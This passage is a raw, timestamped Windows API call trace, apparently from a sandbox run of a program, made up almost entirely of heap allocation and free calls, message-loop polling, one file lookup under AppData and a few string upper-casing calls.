(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0190.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0190.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.538] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0190.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.539] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0190.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/5fNAF_eBT37aF.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e4023a0, ftCreationTime.dwHighDateTime=0x1d4d428, ftLastAccessTime.dwLowDateTime=0xc4185b80, ftLastAccessTime.dwHighDateTime=0x1d4d569, ftLastWriteTime.dwLowDateTime=0xc4185b80, ftLastWriteTime.dwHighDateTime=0x1d4d569, nFileSizeHigh=0x0, nFileSizeLow=0xd7f5, dwReserved0=0xa250039, dwReserved1=0x10586, cFileName="5fNAF_eBT37aF.bmp", cAlternateFileName="5FNAF_~1.BMP")) returned 0xaa58a0 [0190.540] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0190.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.542] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.542] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0190.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.543] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.544] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.544] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.544] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.545] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.545] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.546] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0190.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.547] HeapFree (in: 